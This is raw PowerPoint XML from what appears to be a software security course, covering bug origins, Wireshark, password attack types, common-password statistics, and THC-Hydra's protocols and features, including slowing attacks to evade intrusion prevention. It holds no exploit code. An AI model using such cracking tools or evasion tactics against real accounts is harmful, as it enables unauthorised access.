          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="perspectiveHeroicExtremeLeftFacing"/>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82665" y="4228303"/>
            <a:ext cx="4038008" cy="1239839"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="perspectiveContrastingRightFacing"/>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3870767" y="609600"/>
            <a:ext cx="1539433" cy="1431946"/>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04745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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>he Bug Hypothesis (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Where do bugs come from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bugs arise f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>rom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>software's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ccepting inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>roducing outputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>toring data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>erforming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>computations</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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19800" y="4191000"/>
            <a:ext cx="2298123" cy="2022348"/>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72771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What is Wireshark?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and open-source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>packet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>analyzer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Used for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>etwork troubleshooting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>oftware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and communications protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.wireshark.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{58452FF4-89E3-4D1B-9927-2DBDC00E58D7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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391400" y="5181599"/>
            <a:ext cx="1190625" cy="1190625"/>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164934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676400"/>
            <a:ext cx="3429000" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2590800"/>
            <a:ext cx="2667000" cy="569120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="http://www.amb-consulting.com/en/img/wireshark.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484225" y="865208"/>
            <a:ext cx="4038600" cy="3076575"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5123" name="Picture 3"/>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920187" y="3581400"/>
            <a:ext cx="3086100" cy="2735122"/>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5105400" y="4648199"/>
            <a:ext cx="3086100" cy="984813"/>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200533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Password Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is a password attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>type of software attack in which the attacker tries to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>guess passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or crack encrypted password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ﬁles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>manually or through the use of scripts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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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757386" y="4343399"/>
            <a:ext cx="1629229" cy="1986865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>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88752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Password Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Simple guessing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dictionary attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sing a list of popular passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Password phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Masquerading </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as a trustworthy entity </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>force attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Generating all possible combinations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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329140186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Most Frequently Used Passwords</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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="000000"/>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2985" y="1446183"/>
            <a:ext cx="9146985" cy="4954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806815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Users &amp; Passwords</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="762000"/>
            <a:ext cx="8686800" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>9.8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>% have the passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>password, 123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>12345678;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>14% have a password from the top 10 passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>40% have a password from the top 100 passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>79% have a password from the top 500 passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>91% have a password from the top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>1 000 passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>98.8% have a password from the top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>10 000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>passwords</a:t>
            </a:r>
          </a:p>
          <a:p>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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Chart 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="4191000"/>
          <a:ext cx="9144000" cy="2667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496666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33600" y="4735945"/>
            <a:ext cx="4876800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>THC-Hydra</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842255"/>
            <a:ext cx="3810000" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>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2787207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THC-Hydra?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is THC-Hydra?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A very fast network logon cracker which support many different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of charge for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>non-enterprise use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.thc.org/</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77</a:t>
            </a:fld>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3886200"/>
            <a:ext cx="2590800" cy="2590800"/>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106391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Protocols supported?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Currently this tool supports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POP3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP-GET, HTTP-FORM-POST, HTTPS-GET…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firebird</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subversion (SVN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Telnet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>And many more…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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150495028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of attacks?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What type of attacks can HYDRA-HTC do?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Parallel dictionary attacks (16 threads by default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute force/Hybrid attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Check for null, reversed, same as username passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Slow down the process of attack- prevent detection- IPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  (Intrusion   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevention  System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Parallel attack of different servers</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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20909779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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>eature or Bug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is Software Security a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Feature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ost people consider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>software security as a necessary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>feature of a product</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Vulnerability a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the software "failed" and allowed a hacker to see personal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, most users would consider that a software bug</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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477000" y="4876800"/>
            <a:ext cx="2082800" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="round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32983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install?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="787658"/>
            <a:ext cx="8686800" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
